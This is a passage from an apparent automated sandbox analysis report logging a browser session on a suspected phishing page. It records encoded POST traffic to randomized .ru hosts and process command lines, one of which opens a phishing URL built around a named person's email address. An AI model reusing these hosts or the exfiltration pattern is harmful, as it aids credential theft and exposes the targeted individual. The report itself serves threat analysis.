                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:15 UTC141OUTData Raw: 64 61 74 61 3d 50 6e 34 69 66 54 4f 69 39 4b 67 33 79 37 4e 51 64 4a 70 25 32 42 42 71 78 6a 25 32 46 58 35 65 58 65 77 57 6a 6a 64 4f 70 76 30 56 63 71 71 4c 43 4a 44 74 31 51 61 30 49 45 6a 30 52 76 42 63 63 6c 31 77 64 51 6f 6d 79 50 52 58 57 35 38 6e 4f 6c 51 33 25 32 42 46 68 4a 6f 36 50 6e 72 36 5a 77 48 34 66 63 67 48 58 39 25 32 46 58 77 39 31 6f 52 33 73 75 71 54 76 49 70 63 4b 78 34 30 58 4f 42 72 53 67 54 4c
                                                                  Data Ascii: data=Pn4ifTOi9Kg3y7NQdJp%2BBqxj%2FX5eXewWjjdOpv0VcqqLCJDt1Qa0IEj0RvBccl1wdQomyPRXW58nOlQ3%2BFhJo6Pnr6ZwH4fcgHX9%2FXw91oR3suqTvIpcKx40XOBrSgTL
                                                                  2025-03-14 11:31:18 UTC942INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:18 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 512
                                                                  Connection: close
                                                                  vary: Origin
                                                                  access-control-allow-origin: https://encryption-marinha.jkndfuzv.ru
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=02x1tHAj%2BdPuPDKpGPlLSqG1VBPXn7Z%2FgLZaFsSqbUUGmO9FPpb%2BsjtDLk9c2VtsNUFMNCvwGC9YFVarMMPRUgZpdiv4%2FyADRsElC5BIuBJc7HmQJXkCq5NTYQb%2BcTdAbDzMNyRJNj8DR%2Bi2RhYKKkyrf%2Ft5UqZgObcC4WfXOw%2Bwt8vKIu5NO957pPnQIvpzeXIGWas1"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 920371982a100f91-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1497&rtt_var=563&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1540&delivery_rate=1950567&cwnd=230&unsent_bytes=0&cid=d9601f245fe6c0a9&ts=2293&x=0"
                                                                  2025-03-14 11:31:18 UTC427INData Raw: 6a 6f 31 70 66 6d 54 79 7a 4c 58 5a 63 64 33 52 52 33 6c 2b 37 6c 36 55 61 79 73 74 4c 54 69 6b 69 37 35 39 50 65 56 32 51 6a 47 69 4d 61 31 77 58 54 49 57 32 61 35 55 55 65 4a 53 55 43 43 54 63 74 53 65 67 46 42 2b 37 77 67 61 54 54 57 2f 2b 43 73 54 69 77 35 46 38 71 4c 32 55 4f 61 74 6f 4b 62 67 41 64 2b 37 31 49 59 47 78 6a 61 6e 7a 45 6b 61 32 66 4f 73 2f 69 41 58 36 4b 30 66 38 77 38 59 6a 31 4b 57 54 70 61 43 67 6f 4f 37 54 2b 6d 6a 74 51 52 2b 79 49 6e 38 61 4a 36 2f 45 69 65 35 66 51 36 44 55 61 4f 66 46 77 43 37 54 48 6e 39 71 2b 71 31 50 78 4b 39 2f 30 71 2f 4f 4d 69 63 4f 61 62 4b 4f 59 34 2b 65 33 6a 46 6f 34 35 67 34 56 76 67 31 4f 71 48 4e 32 44 72 59 42 34 54 37 45 45 37 6e 38 55 62 48 6f 71 34 53 7a 45 66 45 68 6b 6e 72 34 48 73 37 43 30
                                                                  Data Ascii: jo1pfmTyzLXZcd3RR3l+7l6UaystLTiki759PeV2QjGiMa1wXTIW2a5UUeJSUCCTctSegFB+7wgaTTW/+CsTiw5F8qL2UOatoKbgAd+71IYGxjanzEka2fOs/iAX6K0f8w8Yj1KWTpaCgoO7T+mjtQR+yIn8aJ6/Eie5fQ6DUaOfFwC7THn9q+q1PxK9/0q/OMicOabKOY4+e3jFo45g4Vvg1OqHN2DrYB4T7EE7n8UbHoq4SzEfEhknr4Hs7C0
                                                                  2025-03-14 11:31:18 UTC85INData Raw: 51 45 58 65 7a 49 56 39 59 33 4a 62 35 56 75 42 74 42 63 46 48 56 70 4d 57 2b 77 6c 6d 7a 38 7a 70 64 68 66 52 54 4f 2f 53 30 73 76 63 6b 53 6e 75 42 41 79 4e 66 64 77 38 6b 6f 6f 37 37 62 36 70 6b 4e 6b 51 45 6f 35 59 2b 42 36 62 31 55 50 34 74 34 55 76
                                                                  Data Ascii: QEXezIV9Y3Jb5VuBtBcFHVpMW+wlmz8zpdhfRTO/S0svckSnuBAyNfdw8koo77b6pkNkQEo5Y+B6b1UP4t4Uv


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  46192.168.2.449781104.21.0.2234435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:40 UTC809OUTPOST /1657887835646082329051glqBcpKqBSNYZZWDQURJYHHOLFEIOJYMGFQXIWHVNyzAC1DJrCw2cQf782PGGsdsFop42 HTTP/1.1
                                                                  Host: yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru
                                                                  Connection: keep-alive
                                                                  Content-Length: 139
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-mobile: ?0
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:40 UTC139OUTData Raw: 64 61 74 61 3d 37 49 4e 48 6a 31 6d 44 5a 53 58 54 35 44 53 44 31 6f 63 7a 71 63 46 6e 41 68 50 76 59 46 57 59 25 32 42 76 4f 52 37 65 59 4d 79 74 58 4c 76 36 6e 71 65 31 65 4e 54 25 32 42 75 75 79 39 6b 35 52 36 33 6d 77 35 79 6e 7a 4d 53 4b 51 6f 34 33 62 33 62 4c 68 53 30 47 74 66 59 41 63 4a 4c 35 4b 51 36 31 77 50 70 4f 33 58 52 51 6d 57 70 7a 4d 4d 39 4b 5a 50 67 5a 54 73 4c 32 67 35 25 32 46 6c 57 4d 74 7a
                                                                  Data Ascii: data=7INHj1mDZSXT5DSD1oczqcFnAhPvYFWY%2BvOR7eYMytXLv6nqe1eNT%2Buuy9k5R63mw5ynzMSKQo43b3bLhS0GtfYAcJL5KQ61wPpO3XRQmWpzMM9KZPgZTsL2g5%2FlWMtz
                                                                  2025-03-14 11:31:41 UTC938INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:41 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 512
                                                                  Connection: close
                                                                  vary: Origin
                                                                  access-control-allow-origin: https://encryption-marinha.jkndfuzv.ru
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nFzJbnxW2ZGe0%2B6gFbDqxUj9aE02TLoBRA37NYT%2FYxtuKG8w%2F5kATCszcdsu%2B53NHLDOJXdRBEm55jVyFlOArgIXHo%2Bfgd4YzSOrPdStoAncVwRQk7zPwVbXl%2FAgU6P2kJvvoE7cP9ZeqXZ1xDInwfSBLjmteBXKf1tj4DN6cjJMlc6d6N6B121nukiEvo1vQRe1zBMe"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203722fec3b42bd-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2200&min_rtt=2192&rtt_var=838&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1542&delivery_rate=1293752&cwnd=206&unsent_bytes=0&cid=0abe4788d12734f5&ts=1118&x=0"
                                                                  2025-03-14 11:31:41 UTC431INData Raw: 6a 6f 31 70 66 6d 54 79 7a 4c 58 5a 63 64 33 52 52 33 6c 2b 37 6c 36 55 61 79 73 74 4c 54 69 6b 69 37 35 39 50 65 56 32 51 6a 47 69 4d 61 31 77 58 54 49 57 32 61 35 55 55 65 4a 53 55 43 43 54 63 74 53 65 67 46 42 2b 37 77 67 61 54 54 57 2f 2b 43 73 54 69 77 35 46 38 71 4c 32 55 4f 61 74 6f 4b 62 67 41 64 2b 37 31 49 59 47 78 6a 61 6e 7a 45 6b 61 32 66 4f 73 2f 69 41 58 36 4b 30 66 38 77 38 59 6a 31 4b 57 54 70 61 43 67 6f 4f 37 54 2b 6d 6a 74 5a 6e 4f 48 71 37 4b 55 6d 6b 2b 36 62 74 43 50 67 54 46 5a 6c 69 73 38 44 69 44 31 51 62 46 38 57 37 65 72 4b 52 75 4d 4a 32 30 4f 62 34 6c 54 6a 48 72 4a 4f 39 73 56 52 59 48 34 64 4a 7a 53 2b 47 48 68 65 79 69 4a 56 6e 49 4a 71 63 63 50 41 72 32 78 70 42 4c 52 6d 41 69 58 43 48 78 4a 4b 54 34 6d 77 6c 76 37 53 44
                                                                  Data Ascii: jo1pfmTyzLXZcd3RR3l+7l6UaystLTiki759PeV2QjGiMa1wXTIW2a5UUeJSUCCTctSegFB+7wgaTTW/+CsTiw5F8qL2UOatoKbgAd+71IYGxjanzEka2fOs/iAX6K0f8w8Yj1KWTpaCgoO7T+mjtZnOHq7KUmk+6btCPgTFZlis8DiD1QbF8W7erKRuMJ20Ob4lTjHrJO9sVRYH4dJzS+GHheyiJVnIJqccPAr2xpBLRmAiXCHxJKT4mwlv7SD
                                                                  2025-03-14 11:31:41 UTC81INData Raw: 6c 77 37 46 65 78 70 38 76 33 45 65 31 48 63 74 34 61 6e 77 48 37 66 63 45 6d 6e 31 65 73 38 44 76 4b 67 65 4b 45 4d 42 6b 69 75 6b 43 5a 4d 31 77 36 43 65 45 2f 67 65 33 37 4a 54 4d 50 4a 4d 77 65 32 46 4d 74 34 6c 66 4e 32 79 38 39 48 39 76
                                                                  Data Ascii: lw7Fexp8v3Ee1Hct4anwH7fcEmn1es8DvKgeKEMBkiukCZM1w6CeE/ge37JTMPJMwe2FMt4lfN2y89H9v


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Target ID:1
                                                                  Start time:07:30:27
                                                                  Start date:14/03/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                  Imagebase:0x7ff786830000
                                                                  File size:3'388'000 bytes
                                                                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:07:30:30
                                                                  Start date:14/03/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,811636083332308569,11067964146906542817,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1756 /prefetch:3
                                                                  Imagebase:0x7ff786830000
                                                                  File size:3'388'000 bytes
                                                                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:07:30:36
                                                                  Start date:14/03/2025
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt"
                                                                  Imagebase:0x7ff786830000
                                                                  File size:3'388'000 bytes
                                                                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  No disassembly